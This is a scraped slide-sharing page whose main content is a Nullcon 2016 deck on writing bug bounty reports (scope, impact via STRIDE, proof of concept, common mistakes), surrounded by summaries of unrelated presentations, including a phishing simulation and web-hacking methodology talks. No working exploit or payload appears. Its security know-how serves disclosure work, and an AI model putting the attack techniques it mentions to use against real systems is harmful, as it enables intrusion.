1) Creating a fake Facebook login page to simulate a phishing scam and collect data on users who entered their credentials.
2) Approximately 1 in 3 Facebook users fell for the simulated scam, indicating users of social media are more vulnerable to phishing.
3) Tests showed Facebook does not effectively deal with phishing attacks. Additional authentication for accessing accounts from new devices was proposed to help address this issue.
The document discusses a biology student's volunteer experience participating in a breast cancer walk for a class assignment, requiring preparation for the event including fundraising and spreading awareness about breast cancer. During the event, the student helped set up, assisted participants, and learned more about how nonprofit organizations support breast cancer research and patients. Overall, the experience provided valuable learning outside of the classroom.
The document discusses security issues related to Ajax and JavaScript. It summarizes how a hacker named Samy was able to infect over 1 million MySpace profiles in 2005 by hiding malicious JavaScript in a URL. It then outlines the security risks if an attacker is able to inject scripts into a user's web page, including being able to make requests to any server, access the user's browser history and cookies, and potentially access the website's database. The document argues that the web's security model is flawed and that an object capability model is needed to properly separate privileges and reduce security risks.
The document discusses security issues related to JavaScript and the web, highlighting problems like cross-site scripting attacks and how current approaches confuse the interests of users and programs; it proposes using an object capability model and strict containment of references to address these issues by distinguishing access and preventing unintended communication between objects. Several approaches are presented that aim to provide security by limiting the capabilities granted to code, including ADsafe which defines a safe JavaScript subset, and Caja which uses runtime rewriting to enforce capabilities.
The document discusses security issues related to Ajax and JavaScript. It summarizes how a hacker named Samy was able to infect over 1 million MySpace profiles in 2005 by hiding malicious JavaScript in a URL. It then outlines the security risks if an attacker is able to inject scripts into a user's web page, including being able to make requests to any server, access the user's browser history and cookies, and potentially access the website's database. The document argues that the web's security model is flawed and that an object capability model is needed to properly separate privileges and reduce security risks.
The document discusses security issues related to JavaScript and the web, highlighting problems like cross-site scripting attacks and the lack of capability controls that allow scripts to access resources without restrictions. It proposes using an object capability model and techniques like ADsafe to constrain what scripts can do by only allowing the acquisition of references through trusted means. The goal is to redesign the DOM and JavaScript to build security in from the start through confinement and least privilege instead of trying to add it later.
This is a PPT of SOCIAL MEDIA THREATS AND THEIR PREVENTION. This is help full for learning. Thanks.
Social media offers an outlet for people to connect, share life experiences, pictures and video. But too much sharing—or a lack of attention to impostors—can lead to a compromise of business and personal accounts.
Attackers often use social media accounts during the reconnaissance phase of a social engineering or phishing attack. Social media can give attackers a platform to impersonate trusted people and brands or the information they need carry out additional attacks, including social engineering and phishing.
Similar to Writing vuln reports that maximize payouts - Nullcon 2016 (20)
Ekoparty 2017 - The Bug Hunter's Methodologybugcrowd
The document outlines a methodology for effectively finding security vulnerabilities in web applications through bug hunting. It covers discovery techniques like using search engines and subdomain enumeration tools. It then discusses mapping the application by directory brute forcing and vulnerability discovery. Specific vulnerability classes covered include XSS, SQLi, file uploads, LFI/RFI, and CSRF. The document provides resources for each vulnerability type and recommends tools that can help automate the testing process.
3 Reasons to Swap Your Next Pen Test With a Bug Bounty Programbugcrowd
This webcast will analyze the key differences between the penetration testing and bug bounty models and explore why one company replaced their pen tests over the last three years.
View this ondemand webinar here: https://pages.bugcrowd.com/7-bug-bounty-myths-busted-ondemand-webinar
About the content:
Despite thousands of large and small organizations running bug bounty programs, there is still a lot of fear and uncertainty about these in the cybersecurity community. In this recorded webinar we will explore 7 myths about Bug Bounty programs, the hackers who are involved, and the impact they are having on the security posture of organizations around the world.
After viewing this presentation and ondemand webinar you will:
1. Learn if a bug bounty program is right for your organization
2. Understand if a bug bounty encourages hackers to attack your systems
3. Explore the real benefits of bug bounty programs – and find out if they actually work
4. Get insight on whether these programs are too hard and costly to manage
AppSecUSA 2016: 'Your License for Bug Hunting Season'bugcrowd
You don’t need a license for bug hunting season anymore. Bug bounty programs are becoming well established as a valuable tool in identifying vulnerabilities early. The Department of Defense has authorized its first bug bounty program, and many vendors are taking a fresh look. While the programs are highly effective, many questions remain about how to structure bug bounty programs to address the concerns that vendors and researchers have about controlling bug hunters, security and privacy, contractual issues with bug hunters, what happens if there is a rogue hacker in the crowd, and liability and compliance concerns. This presentation will cover the best practices for structuring effective bug bounty programs.
Talk originally given at AppSecUSA 2016 | October 13, 2016
Bug Bounty Tipping Point: Strength in Numbersbugcrowd
Recorded on September 21, 2016, Casey Ellis, Bugcrowd CEO and Kymberlee Price, Sr. Director of Researcher Operations, explore current trends in the bug bounty market.
[Webinar] Building a Product Security Incident Response Team: Learnings from ...bugcrowd
Kymberlee Price's Black Hat 2016 talk in a live webcast. This presentation will address some best practices and templates to help security teams build or scale their incident response practices.
1) The document discusses tips for running a successful bug bounty program, including defining scope, focus, and exclusions up front; setting up an accessible testing environment; managing researcher expectations through clear communication; and establishing a vulnerability rating taxonomy.
2) It emphasizes the importance of preparation before launching a program, as well as ongoing communication and process improvement after launch.
3) Not preparing adequately by failing to provide scope or consider exclusions can result in a disaster, whereas a company that took bug bounty seriously saw a reduction in critical issues over time.
Revitalizing Product Securtiy at Zephyr Healthbugcrowd
Zephyr Health, a quickly growing company harnessing the power of global healthcare data, has spent the last year augmenting its’ product security efforts. With Bugcrowd’s help, they have transformed their development and overarching culture to prioritize security. Bugcrowd joins Zephyr Health’s CISO, Kim Green, to hear about how she came to understand and implement crowdsourced security testing within the organization.
HI THIS IS URGENT PLZ FIX ASAP: Critical Vunlerabilities and Bug Bounty Programsbugcrowd
Kymberlee Price's Presentation from Black Hat 2015 In this presentation, Kymberlee discusses several highly critical vulnerabilities that have been uncovered through a variety of bug bounty programs and their impact on the customers. With participation from researchers and vendors, attendees will not only see some sweet vulnerabilities broken down, but also why wading through another submission from @CluelessSec might be worth it.
How Portal Can Change Your Security Forever - Kati Rodzon at BSidesLVbugcrowd
When used correctly, gamification can be one of the most effective tools for changing behavior on a large scale, but it requires more than just designing a few digital merit badges for doing security training. In this talk Kati Rodzon will discuss how games like Portal and Candy Crush were able to make millions and how those same techniques can be used to change security as we know it.
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...bugcrowd
1. The document provides tips for effective hacking and bug hunting in 2015, focusing on web applications.
2. It discusses philosophy shifts towards crowdsourced testing, and techniques for discovery such as finding less tested application parts and acquisitions.
3. The document also covers mapping methodology, parameters to attack, and bypassing filters for XSS, SQLi, file inclusion, and CSRF vulnerabilities.
Crowdsourcing a penetration test through Bugcrowd's Flex model offers four main benefits: 1) You pay only for valid vulnerabilities found rather than researcher time spent; 2) Engaging many skilled researchers across different specialties increases the likelihood of finding issues; 3) The reward structure encourages in-depth testing by incentivizing top submissions; 4) This results in significantly more testing effort within similar timeframes as a traditional penetration test.
Mobile Application Security Threats through the Eyes of the Attackerbugcrowd
As an active security researcher with immense professional expertise in application security, Jason Haddix joins us to explain the common attack vectors that face today’s mobile applications -- from a hacker’s perspective.
Build or Buy: The Barracuda Bug Bounty Story [Webinar]bugcrowd
The webinar discusses Barracuda's transition from an in-house bug bounty program to a third-party program managed by Bugcrowd. It describes how Barracuda initially built its own program in 2010, then weighed the pros and cons of switching to Bugcrowd for its scalability and to offload management of bounty payouts. The webinar outlines Barracuda's process for transitioning to Bugcrowd and how it adjusted its security team workflow and integration of bug submissions. Program stats from Bugcrowd show Barracuda paid out $27,771 on 316 submissions with an average priority of 3.5.
5 Tips to Successfully Running a Bug Bounty Programbugcrowd
Learn why bug bounties are great tools in application security, why they can be difficult, and how you can utilize them to start finding more critical vulnerabilities.
[Webinar] The Art & Value of Bug Bounty Programsbugcrowd
Her TED talk on the power of bug bounties has over a million views, on May 20, 2015, cybersecurity expert Keren Elazari joined Bugcrowd for an exclusive webinar. We did some bug bounty myth busting and trend spotting and had a great turnout. Keren's slides are here.
Key Takeaways from Instructure's Successful Bug Bounty Programbugcrowd
Slides used during Bugcrowd's 3/5/2015 webinar with Instructure, the innovative company behind Canvas Learning Management System. Learn why they turned to crowdsourced security, and how Bugcrowd's Flex program gave them great results.
How to run a kick ass bug bounty program - Node Summit 2013bugcrowd
Bug bounty programs are all about getting good guys who think like bad guys to help you protect your business from application security flaws. In this workshop Casey Ellis and Chris Raethke from Bugcrowd, The Bug Bounty Company, will go through some of the tricks and tips of setting up and running a successful bug bounty program.
Trusted Execution Environment for Decentralized Process MiningLucaBarbaro3
Presentation of the paper "Trusted Execution Environment for Decentralized Process Mining" given during the CAiSE 2024 Conference in Cyprus on June 7, 2024.
Generating privacy-protected synthetic data using Secludy and MilvusZilliz
During this demo, the founders of Secludy will demonstrate how their system utilizes Milvus to store and manipulate embeddings for generating privacy-protected synthetic data. Their approach not only maintains the confidentiality of the original data but also enhances the utility and scalability of LLMs under privacy constraints. Attendees, including machine learning engineers, data scientists, and data managers, will witness first-hand how Secludy's integration with Milvus empowers organizations to harness the power of LLMs securely and efficiently.
Dive into the realm of operating systems (OS) with Pravash Chandra Das, a seasoned Digital Forensic Analyst, as your guide. 🚀 This comprehensive presentation illuminates the core concepts, types, and evolution of OS, essential for understanding modern computing landscapes.
Beginning with the foundational definition, Das clarifies the pivotal role of OS as system software orchestrating hardware resources, software applications, and user interactions. Through succinct descriptions, he delineates the diverse types of OS, from single-user, single-task environments like early MS-DOS iterations, to multi-user, multi-tasking systems exemplified by modern Linux distributions.
Crucial components like the kernel and shell are dissected, highlighting their indispensable functions in resource management and user interface interaction. Das elucidates how the kernel acts as the central nervous system, orchestrating process scheduling, memory allocation, and device management. Meanwhile, the shell serves as the gateway for user commands, bridging the gap between human input and machine execution. 💻
The narrative then shifts to a captivating exploration of prominent desktop OSs, Windows, macOS, and Linux. Windows, with its globally ubiquitous presence and user-friendly interface, emerges as a cornerstone in personal computing history. macOS, lauded for its sleek design and seamless integration with Apple's ecosystem, stands as a beacon of stability and creativity. Linux, an open-source marvel, offers unparalleled flexibility and security, revolutionizing the computing landscape. 🖥️
Moving to the realm of mobile devices, Das unravels the dominance of Android and iOS. Android's open-source ethos fosters a vibrant ecosystem of customization and innovation, while iOS boasts a seamless user experience and robust security infrastructure. Meanwhile, discontinued platforms like Symbian and Palm OS evoke nostalgia for their pioneering roles in the smartphone revolution.
The journey concludes with a reflection on the ever-evolving landscape of OS, underscored by the emergence of real-time operating systems (RTOS) and the persistent quest for innovation and efficiency. As technology continues to shape our world, understanding the foundations and evolution of operating systems remains paramount. Join Pravash Chandra Das on this illuminating journey through the heart of computing. 🌟
Main news related to the CCS TSI 2023 (2023/1695)Jakub Marek
An English 🇬🇧 translation of a presentation to the speech I gave about the main changes brought by CCS TSI 2023 at the biggest Czech conference on Communications and signalling systems on Railways, which was held in Clarion Hotel Olomouc from 7th to 9th November 2023 (konferenceszt.cz). Attended by around 500 participants and 200 on-line followers.
The original Czech 🇨🇿 version of the presentation can be found here: https://www.slideshare.net/slideshow/hlavni-novinky-souvisejici-s-ccs-tsi-2023-2023-1695/269688092 .
The videorecording (in Czech) from the presentation is available here: https://youtu.be/WzjJWm4IyPk?si=SImb06tuXGb30BEH .
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdfMalak Abu Hammad
Discover how MongoDB Atlas and vector search technology can revolutionize your application's search capabilities. This comprehensive presentation covers:
* What is Vector Search?
* Importance and benefits of vector search
* Practical use cases across various industries
* Step-by-step implementation guide
* Live demos with code snippets
* Enhancing LLM capabilities with vector search
* Best practices and optimization strategies
Perfect for developers, AI enthusiasts, and tech leaders. Learn how to leverage MongoDB Atlas to deliver highly relevant, context-aware search results, transforming your data retrieval process. Stay ahead in tech innovation and maximize the potential of your applications.
#MongoDB #VectorSearch #AI #SemanticSearch #TechInnovation #DataScience #LLM #MachineLearning #SearchTechnology
Best 20 SEO Techniques To Improve Website Visibility In SERPPixlogix Infotech
Boost your website's visibility with proven SEO techniques! Our latest blog dives into essential strategies to enhance your online presence, increase traffic, and rank higher on search engines. From keyword optimization to quality content creation, learn how to make your site stand out in the crowded digital landscape. Discover actionable tips and expert insights to elevate your SEO game.
Building Production Ready Search Pipelines with Spark and MilvusZilliz
Spark is the widely used ETL tool for processing, indexing and ingesting data to serving stack for search. Milvus is the production-ready open-source vector database. In this talk we will show how to use Spark to process unstructured data to extract vector representations, and push the vectors to Milvus vector database for search serving.
Taking AI to the Next Level in Manufacturing.pdfssuserfac0301
Read Taking AI to the Next Level in Manufacturing to gain insights on AI adoption in the manufacturing industry, such as:
1. How quickly AI is being implemented in manufacturing.
2. Which barriers stand in the way of AI adoption.
3. How data quality and governance form the backbone of AI.
4. Organizational processes and structures that may inhibit effective AI adoption.
6. Ideas and approaches to help build your organization's AI strategy.
Driving Business Innovation: Latest Generative AI Advancements & Success StorySafe Software
Are you ready to revolutionize how you handle data? Join us for a webinar where we’ll bring you up to speed with the latest advancements in Generative AI technology and discover how leveraging FME with tools from giants like Google Gemini, Amazon, and Microsoft OpenAI can supercharge your workflow efficiency.
During the hour, we’ll take you through:
Guest Speaker Segment with Hannah Barrington: Dive into the world of dynamic real estate marketing with Hannah, the Marketing Manager at Workspace Group. Hear firsthand how their team generates engaging descriptions for thousands of office units by integrating diverse data sources—from PDF floorplans to web pages—using FME transformers, like OpenAIVisionConnector and AnthropicVisionConnector. This use case will show you how GenAI can streamline content creation for marketing across the board.
Ollama Use Case: Learn how Scenario Specialist Dmitri Bagh has utilized Ollama within FME to input data, create custom models, and enhance security protocols. This segment will include demos to illustrate the full capabilities of FME in AI-driven processes.
Custom AI Models: Discover how to leverage FME to build personalized AI models using your data. Whether it’s populating a model with local data for added security or integrating public AI tools, find out how FME facilitates a versatile and secure approach to AI.
We’ll wrap up with a live Q&A session where you can engage with our experts on your specific use cases, and learn more about optimizing your data workflows with AI.
This webinar is ideal for professionals seeking to harness the power of AI within their data management systems while ensuring high levels of customization and security. Whether you're a novice or an expert, gain actionable insights and strategies to elevate your data processes. Join us to see how FME and AI can revolutionize how you work with data!
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAUpanagenda
Webinar Recording: https://www.panagenda.com/webinars/hcl-notes-und-domino-lizenzkostenreduzierung-in-der-welt-von-dlau/
DLAU und die Lizenzen nach dem CCB- und CCX-Modell sind für viele in der HCL-Community seit letztem Jahr ein heißes Thema. Als Notes- oder Domino-Kunde haben Sie vielleicht mit unerwartet hohen Benutzerzahlen und Lizenzgebühren zu kämpfen. Sie fragen sich vielleicht, wie diese neue Art der Lizenzierung funktioniert und welchen Nutzen sie Ihnen bringt. Vor allem wollen Sie sicherlich Ihr Budget einhalten und Kosten sparen, wo immer möglich. Das verstehen wir und wir möchten Ihnen dabei helfen!
Wir erklären Ihnen, wie Sie häufige Konfigurationsprobleme lösen können, die dazu führen können, dass mehr Benutzer gezählt werden als nötig, und wie Sie überflüssige oder ungenutzte Konten identifizieren und entfernen können, um Geld zu sparen. Es gibt auch einige Ansätze, die zu unnötigen Ausgaben führen können, z. B. wenn ein Personendokument anstelle eines Mail-Ins für geteilte Mailboxen verwendet wird. Wir zeigen Ihnen solche Fälle und deren Lösungen. Und natürlich erklären wir Ihnen das neue Lizenzmodell.
Nehmen Sie an diesem Webinar teil, bei dem HCL-Ambassador Marc Thomas und Gastredner Franz Walder Ihnen diese neue Welt näherbringen. Es vermittelt Ihnen die Tools und das Know-how, um den Überblick zu bewahren. Sie werden in der Lage sein, Ihre Kosten durch eine optimierte Domino-Konfiguration zu reduzieren und auch in Zukunft gering zu halten.
Diese Themen werden behandelt
- Reduzierung der Lizenzkosten durch Auffinden und Beheben von Fehlkonfigurationen und überflüssigen Konten
- Wie funktionieren CCB- und CCX-Lizenzen wirklich?
- Verstehen des DLAU-Tools und wie man es am besten nutzt
- Tipps für häufige Problembereiche, wie z. B. Team-Postfächer, Funktions-/Testbenutzer usw.
- Praxisbeispiele und Best Practices zum sofortigen Umsetzen
2. 2
whoami
• Senior Director of a Red Team
• PSIRT Case Manager
• Data Analyst
• Internet Crime Investigator
• Behavioral Psychologist
• Lawful Good
@kym_possible
3. 3
Out of Scope earns no $$
Step 1: Read The Bounty Brief
h"ps://blog.bugcrowd.com/pro2p-‐read-‐the-‐bounty-‐brief/
h"ps://blog.bugcrowd.com/public-‐disclosure-‐policy-‐2016
h"ps://forum.bugcrowd.com/t/in-‐scope-‐and-‐public-‐disclosure/933
4. 4
Step 2: Understand the Impact
Knowing what kind of vulnerability
you’ve found is important.
Communicating the Impact of that
Vulnerability in your submission is even
more important.
Impact is what drives severity and
prioritization decisions.
Severity is what determines how much
you get paid out.
STRIDE Model
Spoofing
Tampering
Repudiation
Information Disclosure
DoS
Elevation of Privilege
h"ps://forum.bugcrowd.com/t/wri2ng-‐a-‐bug-‐report-‐a"ack-‐scenario-‐and-‐impact-‐are-‐key/640
5. 5
Example: Why Impact > Vuln Type
Submission:
Create a $APPLICATION account.
go to dashboard and click on $FUNCTIONALITY
Enter all the details.
There is a parameter called $NAME at the end of $FUNCTIONALITY
Enter the javascript payload and you can see the popup.
This is a valid XSS vulnerability that results in elevation of privilege, but is very low
priority to fix. Why?
The attacker has to social engineer the victim to install code, this requires significant
victim interaction and is not remotely exploitable.
Once the cookie is stolen the attacker can only exploit that one victim; the attacker
has to exploit each victim individually. The vulnerability does not affect multiple
users or the system integrity.
6. 6
Step 3: POC|GTFO
Getting a scan result isn’t enough
Finding an out of date library with known CVEs isn’t enough
You have to validate that the application is actually exploitable. BUT BE CAREFUL
– don’t take down an app or pivot to compromise data. If you ever question “should
I try to exploit this” submit the bug without POC and ask.
Share POC videos and code samples SECURELY. (i.e. Don’t Use YouTube)
Explain the Attack Scenario:
• Attacker does X
• Victim does Y (where Y may be “nothing”)
• Attacker can now do Z
7. 7
Scenario 1: The reproduction steps and attack scenario are incomplete and unclear.
Mistakes I’ve Seen
Submitted:
An attacker creates a fake account and changes his e-mail. The e-mail
confirmation link can now be used to login someone into the fake account and
then then monitor actions performed by the victim or even interact with him.
Let's break down why that is going to get rejected as invalid:
o An attacker creates a fake account <-- what kind of account? user? do they
need to be an admin to do this?
o and changes his e-mail. <-- changes it to what? the victim's email?
o The e-mail confirmation link can now be used <-- by whom?
o to login someone <-- the victim?
o into the fake account <-- why would the victim do this?
o and then then monitor actions performed by the victim or even interact with
him. <-- so they can view the victim's actions? can they access the victim's
account settings without victim interaction?
8. 8
Scenario 2: The submission requires another vulnerability to be exploited first
Mistakes I’ve Seen
If a submission starts with
"Suppose I am an attacker and (the user's browser is compromised/I got access
to the recovery email option of your $APPLICATION account)”
Everything that comes next is not exploitable on its own and requires a second
theoretical vulnerability in the application. While in some cases the report may
recommend a legitimate security best practice, in most cases those are
unrewardable in bounty programs.
9. 9
Scenario 3: the exploit impact is unclear.
Mistakes I’ve Seen
Submitted:
An attacker is just required to send an email confirmation link to the victim & he'll
be automatically logged into his (attacker's) account. I can then monitor his
actions & interact
Ok, this means that the attacker has just compromised themselves by giving the
"victim" access to the attacker's account. The victim account is not in any way
compromised, unless the attacker manages to elaborately social engineer the victim
to give up their credentials to the attacker once logged into the attacker account.
But if I can get you to click an email link, that isn't a web application vulnerability the
customer can patch.
10. 10
Scenario 4: not a vulnerability
Mistakes I’ve Seen
Submission:
Application Allows it users to change their USERNAME, and there is big issue is
no prevention of account name takeover.
let's explain:-
1. suppose "Kymberlee" is change their username to Kymberlee1 ok but
interesting bug is your application not blacklisting old username and anyone can
takeover old username. and there is also no limit of username change.
security risk:-
i'm sure every researcher posting own cobalt,hackerone,bugcrowd links on social
sites and other accounts for showing own rank.
but what if after 6th month of posting. user changed their username to another
name? old link is stil not blacklisted any other fake core researcher can takeover
old name .
The ability to change usernames is intended functionality. Now if the attacker can
change my username without my involvement, then THAT is a vulnerability to be
rewarded and fixed!
11. 11
TL;DR
• Read the Bounty Brief so you focus on rewardable vulnerabilities
• Communicate Impact – STRIDE model
• Verify findings and provide POC & Attack Scenario
h"ps://forum.bugcrowd.com/t/wri2ng-‐a-‐bug-‐report-‐a"ack-‐scenario-‐and-‐impact-‐are-‐key/640